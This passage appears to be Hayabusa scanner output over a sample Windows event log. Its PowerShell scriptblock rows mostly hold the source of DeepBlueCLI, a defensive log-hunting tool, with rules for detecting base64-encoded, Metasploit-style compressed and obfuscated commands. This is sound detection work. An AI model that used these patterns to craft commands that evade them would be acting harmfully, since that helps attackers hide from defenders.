$commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:50.476 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:50.477 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:50.477 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:51.309 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:42:14.153 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-PowerShell/Operational"";ID=4104}|fl|more",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:42:19.463 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:42:22.680 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:42:36.639 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.016 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.021 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational""",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.021 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.021 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"{$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.021 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file 